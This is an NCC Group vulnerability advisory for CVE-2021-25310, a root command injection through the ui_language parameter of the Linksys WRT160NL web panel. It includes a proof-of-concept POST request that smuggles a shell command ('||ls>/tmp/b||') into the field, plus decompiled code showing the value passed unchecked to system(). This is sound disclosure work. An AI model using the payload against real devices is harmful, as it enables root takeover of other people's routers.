Current Vendor: Belkin (Linksys)
Vendor URL: https://www.linksys.com/sg/p/P-WRT160NL/
Versions affected: 1.0.04 build 2 (FW_WRT160NL_1.0.04.002_US_20130619_code.bin)
Systems Affected: Linksys WRT160NL
Authors: Manuel Ginés - Manuel.Gines[at]nccgroup[dot]com && Diego Gómez Marañón – Diego.GomezMaranon[at]nccgroup[dot]com 
CVE Identifier: CVE-2021-25310
Risk: 8.8 (High) - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

The Linksys WRT160NL is a switch device initially owned by Cisco and, after the sale of its respective technology branch, by Belkin. In the latest version of the official firmware, the web management panel contained a remote code execution vulnerability that could be triggered by requesting an authenticated endpoint.

Impact

Successful exploitation of this vulnerability can lead to remote code execution on the affected device.

Details

The administration web panel allows users to change the UI language sending a POST request to the apply.cgi endpoint. That parameter is being used internally as part of a filesystem path in a OS command. The lack of output encoding and input validation allowed authenticated attackers to inject OS commands that will be executed with root privileges.

The following request was used to execute a directory listing and redirect the output to a file in tmp directory:

POST /apply.cgi;session_id=8e780f3bcc71e19a37cc3e60a5576241 HTTP/1.1
Host: 192.168.1.150
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 854
Origin: http://192.168.1.150
Connection: close
Referer: http://192.168.1.150/index.asp;session_id=8e780f3bcc71e19a37cc3e60a5576241
Upgrade-Insecure-Requests: 1

pptp_dhcp=0&(...)&ui_language=es||ls>/tmp/b||&(...)

The affected function was found to be do_upgrade_post from mini_httpd binary, and its decompiled code can be checked below.

void do_upgrade_post(char *param_1,undefined4 param_2,int param_3){
 (…snip…)
 puVar7 = (undefined1 *)nvram_get("ui_language");
 local_30 = 0;
 if (puVar7 == (undefined1 *)0x0){
   puVar7 = &DAT_00484b64;
 }
 snprintf(acStack112,0x40,"cp /www/%s_lang_pack/captmp.js /tmp/.",puVar7);
 system(acStack112);
 (…snip…)
}

Recommendation

Due to the fact that the product is no longer supported, the best option is to update its firmware with an open-source alternative like OpenWRT.

Vendor Communication

  • 22 Jan 2021 – NCC Group contacted Belkin to make them aware of the found vulnerability.
  • 22 Jan 2021 – Response from Belkin explaining that the device is not actively supported.
  • 28 Jan 2021 – Advisory published.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date: 28/01/2021
Written by: Manuel Ginés Rodríguez && Diego Gómez Marañón